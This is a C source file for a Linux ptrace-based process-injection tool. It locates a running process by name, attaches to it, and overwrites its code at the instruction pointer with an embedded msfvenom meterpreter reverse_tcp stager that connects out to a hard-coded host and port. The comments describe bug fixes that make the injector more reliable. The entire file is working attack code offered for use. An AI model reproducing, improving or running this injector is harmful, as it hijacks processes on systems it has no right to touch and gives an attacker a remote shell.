#include <dirent.h>
#include <errno.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/reg.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>
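/*
 * PAYLOAD = linux/x64/meterpreter/reverse_tcp
 * LHOST = 192.168.43.40
 * LPORT = 32415
 *
 * 68-byte stager as emitted by msfvenom. The run `02 00 7e 9f c0 a8 2b 28`
 * is the embedded sockaddr_in: AF_INET, port 0x7e9f = 32415 and
 * 192.168.43.40, both in network byte order. Regenerate the payload rather
 * than patching those bytes by hand when LHOST/LPORT change.
 */
unsigned char reverse[] =
"\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x56\x50\x6a\x29\x58\x99\x6a"
"\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48\xb9\x02\x00\x7e\x9f"
"\xc0\xa8\x2b\x28\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f"
"\x05\x59\x5e\x5a\x0f\x05\xff\xe6";

/*
 * Number of payload bytes to write into the target, derived from the array
 * (minus the string-literal NUL) so it can never exceed the payload. The
 * original hard-coded 128 for a 68-byte array, so inject_data read 60 bytes
 * past the end of `reverse` and clobbered that much extra code in the target.
 */
#define SHELLCODE_SIZE ((int) (sizeof reverse - 1))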
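/*
 * GetPID - find a running process by name.
 *
 * PID_Name: name to look for, compared byte-for-byte against
 *           /proc/<pid>/comm (the name top/ps display; the kernel truncates
 *           comm to 15 characters). Examples: "top", "bash", "mate-panel".
 * Returns the first matching pid in /proc directory order, or -1 when
 * PID_Name is NULL or empty, /proc cannot be opened, or nothing matches.
 *
 * Why the original `system("pidof NAME > /tmp/pidof")` was replaced: it
 * strcpy/strcat'ed the name into a 50-byte buffer with no bound, handed it to
 * a shell unquoted (a name containing shell metacharacters runs commands),
 * wrote through a predictable path in world-writable /tmp (a symlink planted
 * there by another local user redirects the write), and dereferenced the
 * fopen result without checking it. Walking /proc needs no shell and no
 * temp file. Difference from pidof: matching is by comm, not executable path.
 */
int GetPID(char* PID_Name){
    if (PID_Name == NULL || PID_Name[0] == '\0')
        return -1;

    DIR *proc = opendir("/proc");
    if (proc == NULL)
        return -1;

    int found = -1;
    struct dirent *ent;
    while (found == -1 && (ent = readdir(proc)) != NULL) {
        /* Only all-digit entries are process directories. */
        char *end = NULL;
        errno = 0;
        long pid = strtol(ent->d_name, &end, 10);
        if (end == ent->d_name || *end != '\0' || errno == ERANGE ||
            pid <= 0 || pid > INT_MAX)
            continue;

        char path[64];
        int n = snprintf(path, sizeof path, "/proc/%ld/comm", pid);
        if (n < 0 || (size_t) n >= sizeof path)
            continue;

        FILE *fp = fopen(path, "r");
        if (fp == NULL)
            continue;   /* process exited meanwhile, or not readable: skip */

        char comm[256] = {0};
        if (fgets(comm, sizeof comm, fp) != NULL) {
            comm[strcspn(comm, "\n")] = '\0';
            if (strcmp(comm, PID_Name) == 0)
                found = (int) pid;
        }
        fclose(fp);
    }
    closedir(proc);
    return found;
}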
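/*
 * inject_data - copy len bytes from src into the memory of a stopped tracee.
 *
 * pid: tracee already attached with PTRACE_ATTACH and in ptrace-stop.
 * src: bytes to write; must hold at least len bytes.
 * dst: address inside the tracee to write to.
 * len: number of bytes to write; 0 writes nothing and succeeds.
 *
 * Returns 0 on success, -1 with errno set when a ptrace call fails or the
 * arguments are invalid (negative len, or NULL src with len > 0).
 *
 * PTRACE_POKETEXT stores one native word (sizeof(long), 8 bytes on x86_64)
 * per call, so the copy steps one word at a time and builds each word from
 * src with memcpy; the word's in-memory bytes land at dst+off in order. The
 * original stepped by 4 bytes while reading src through a uint32_t pointer
 * (an aliasing/alignment violation), passed a 32-bit value where ptrace
 * takes a long, ignored every ptrace error, and trusted len against an
 * array it never sized. A trailing partial word is merged with the tracee's
 * existing bytes via PTRACE_PEEKTEXT so nothing past dst+len is modified.
 */
int inject_data (int pid, unsigned char *src, void *dst, int len)
{
    if (len < 0 || (len > 0 && src == NULL)) {
        errno = EINVAL;
        return -1;
    }

    /* Integer arithmetic on the remote address: it is not a pointer we own. */
    uintptr_t base = (uintptr_t) dst;
    for (int off = 0; off < len; off += (int) sizeof (long)) {
        size_t chunk = (size_t) (len - off);
        long word = 0;
        if (chunk >= sizeof (long)) {
            chunk = sizeof (long);
        } else {
            /* Tail shorter than a word: keep the tracee's bytes beyond len.
             * PEEKTEXT returns the word itself, so errno distinguishes a
             * genuine -1 from a failure. */
            errno = 0;
            word = ptrace (PTRACE_PEEKTEXT, pid, (void *) (base + off), NULL);
            if (word == -1 && errno != 0)
                return -1;
        }
        memcpy (&word, src + off, chunk);
        if (ptrace (PTRACE_POKETEXT, pid, (void *) (base + off), (void *) word) == -1)
            return -1;
    }
    return 0;
}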
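/*
 * Entry point: attach to a running process by name, overwrite the code at
 * its current instruction pointer with the `reverse` payload, and resume it.
 *
 * argv[1] optionally names the target (as shown in /proc/<pid>/comm, e.g.
 * top, bash, mate-panel); the default stays "top" as in the original.
 * Returns 0 on success, 1 on any failure. x86_64 Linux only (rip, sys/reg.h).
 *
 * Caveats: the target's original instructions are neither saved nor
 * restored, so the process is permanently hijacked. PTRACE_ATTACH needs
 * permission over the target (root, or the same uid with a permissive Yama
 * ptrace_scope); the original checked none of its ptrace calls and would
 * silently do nothing when GetPID returned -1.
 */
int main (int argc, char *argv[])
{
    const char *name = (argc > 1) ? argv[1] : "top";
    int target = GetPID ((char *) name);
    if (target <= 0) {
        fprintf (stderr, "no running process named \"%s\"\n", name);
        return 1;
    }

    if (ptrace (PTRACE_ATTACH, target, NULL, NULL) == -1) {
        perror ("PTRACE_ATTACH");
        return 1;
    }
    /* waitpid on the tracee, not wait(NULL): only this pid's stop counts. */
    int status = 0;
    if (waitpid (target, &status, 0) == -1 || !WIFSTOPPED (status)) {
        fprintf (stderr, "pid %d did not enter ptrace-stop\n", target);
        ptrace (PTRACE_DETACH, target, NULL, NULL);
        return 1;
    }

    struct user_regs_struct regs;
    if (ptrace (PTRACE_GETREGS, target, NULL, &regs) == -1) {
        perror ("PTRACE_GETREGS");
        ptrace (PTRACE_DETACH, target, NULL, NULL);
        return 1;
    }

    /* sizeof gives the real payload length (string NUL excluded); the
     * original passed SHELLCODE_SIZE, hard-coded to 128, for a 68-byte array
     * and so read past `reverse` and overwrote 60 extra bytes of the target. */
    int len = (int) (sizeof reverse - 1);
    if (inject_data (target, reverse, (void *) regs.rip, len) == -1) {
        perror ("PTRACE_POKETEXT");
        ptrace (PTRACE_DETACH, target, NULL, NULL);
        return 1;
    }

    /* Kept from the original. Presumably it offsets the kernel's syscall
     * restart, which rewinds rip by the 2-byte `syscall` instruction when the
     * tracee was interrupted inside a blocking syscall (an idle top usually
     * is). If the target was stopped anywhere else, execution resumes 2 bytes
     * into the payload instead of at its start. */
    regs.rip += 2;
    if (ptrace (PTRACE_SETREGS, target, NULL, &regs) == -1) {
        perror ("PTRACE_SETREGS");
        ptrace (PTRACE_DETACH, target, NULL, NULL);
        return 1;
    }
    if (ptrace (PTRACE_DETACH, target, NULL, NULL) == -1) {
        perror ("PTRACE_DETACH");
        return 1;
    }
    return 0;
}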